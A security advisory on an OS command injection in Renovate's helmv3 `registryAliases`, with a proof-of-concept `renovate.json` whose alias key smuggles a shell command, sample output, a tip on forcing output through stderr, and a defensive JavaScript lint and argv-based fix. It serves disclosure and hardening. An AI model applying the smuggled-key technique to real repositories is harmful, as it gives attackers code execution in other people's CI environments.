CWE: 78

GHSA-rqgv-292v-5qgr: OS Command Injection

First published: Tue Apr 23 2024

### Summary

Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 `registryAliases` to execute arbitrary commands.

### Details

Since [#26848](https://github.com/renovatebot/renovate/pull/26848), `registryAliases` has become mergeable. This means that the helmv3 manager started honoring its value and runs a `helm repo add <key> <parameters>` command for each defined alias. See source code: https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80

The key was not quoted, leading to the ability to use variable references (`$FOO`) in it and have them printed by Renovate on the pull request, or even to run arbitrary shell commands.

### PoC

Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example:

test-chart/Chart.yaml:

```yaml
apiVersion: v2
name: redis
version: 1.0.0
dependencies:
  - name: redis
    version: 18.13.10
    repository: oci://registry-1.docker.io/bitnamicharts
```

test-chart/Chart.lock:

```yaml
dependencies:
  - name: redis
    repository: oci://registry-1.docker.io/bitnamicharts
    version: 18.13.10
digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38
generated: "2024-02-16T13:31:20.807026334Z"
```

Then add the following `renovate.json`:

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": [
    "config:base"
  ],
  "registryAliases": {
    "foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy"
  }
}
```

Once Renovate runs on the repository, it will create a pull request and add a comment titled "Artifact update problem" containing the following text:

```
File name: test-chart/Chart.lock
Command failed: helm repo add foo/bar || sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-update
Error: "helm repo add" requires 2 arguments

Usage:  helm repo add [NAME] [URL] [flags]

bin
boot
dev
etc
go
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```

This shows that the `ls` command executed successfully, and we can even see its output. Note that redirecting any output you want to see to stderr (`>&2`) and making sure the final command fails (`exit 1`) is required in this case, as Renovate only adds a comment if the command fails, and the comment contains only stderr (not stdout) output.

### Impact

All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.
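The root cause above is a configuration key spliced unquoted into a shell command line. The following is an added example, not Renovate's own code, showing the two defences a maintainer or operator would want: a lint that rejects `registryAliases` keys carrying shell metacharacters before any command is built, and a command builder that passes an argv array (for `child_process.execFile`) so no shell ever parses the key. The allow-list pattern for alias names is an assumed policy, not Renovate's validation rule, and the sample configuration is constructed from the PoC above plus one benign alias.

```javascript
// Added example (not Renovate's code). Defends against the unquoted
// `helm repo add <key> <url>` pattern described in the advisory.

// A legitimate Helm repo alias: letters, digits, dots, underscores, dashes and
// slashes, starting with an alphanumeric, at most 128 characters.
// This is an assumed policy; tighten or loosen it for your environment.
const SAFE_ALIAS_KEY = /^[A-Za-z0-9][A-Za-z0-9._\/-]{0,127}$/;

function isSafeAliasKey(key) {
  return typeof key === 'string' && SAFE_ALIAS_KEY.test(key);
}

// Walk a parsed renovate.json and return every registryAliases key that fails
// the allow-list. Usable as a pre-merge lint on the default branch, which is
// exactly where the advisory says the attacker needs commit access.
function findUnsafeAliasKeys(config) {
  const aliases = (config && config.registryAliases) || {};
  return Object.keys(aliases).filter((key) => !isSafeAliasKey(key));
}

// POSIX single-quoting: inside '...' nothing is interpreted, so the only
// character to neutralise is an embedded quote, which becomes '\''
// (close the quote, emit an escaped quote, reopen). Use this only where a
// shell string is genuinely unavoidable; prefer the argv form below.
function shellQuote(arg) {
  return `'${String(arg).replace(/'/g, `'\\''`)}'`;
}

// Vulnerable shape (what the advisory describes): the key is interpolated into
// a string a shell will later parse, so `||`, `;`, `$FOO` and `>&2` are live.
function buildHelmRepoAddUnsafe(key, url) {
  return `helm repo add ${key} ${url} --force-update`;
}

// Hardened shape: validate, then return { file, args } for execFile. With an
// argv array the key reaches helm as a single argument, metacharacters and all,
// so at worst helm rejects an odd repo name; nothing runs `ls /`.
function buildHelmRepoAddArgv(key, url) {
  if (!isSafeAliasKey(key)) {
    throw new Error(`rejected registryAliases key: ${JSON.stringify(key)}`);
  }
  return { file: 'helm', args: ['repo', 'add', key, url, '--force-update'] };
}

// Constructed sample: the renovate.json from the PoC plus a benign alias.
const SAMPLE_CONFIG = {
  $schema: 'https://docs.renovatebot.com/renovate-schema.json',
  extends: ['config:base'],
  registryAliases: {
    "foo/bar || sh -c 'ls /; exit 1' >&2": 'registry.example.com/proxy',
    bitnami: 'https://charts.example.com/stable', // placeholder URL
  },
};

console.log('unsafe keys:', findUnsafeAliasKeys(SAMPLE_CONFIG));
console.log('argv form:', buildHelmRepoAddArgv('bitnami', SAMPLE_CONFIG.registryAliases.bitnami));
console.log('quoted key:', shellQuote("foo/bar || sh -c 'ls /; exit 1' >&2"));
```

Running the lint over the PoC configuration reports the injected key and nothing else; the argv builder refuses it outright, while the benign `bitnami` alias is accepted and passed to helm as five discrete arguments.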

| Affected Software | Affected Version | How to fix |
|---|---|---|
| npm/renovate | >=37.158.0 <37.199.0 | 37.199.0 |

© 2024 SecAlerts Pty Ltd.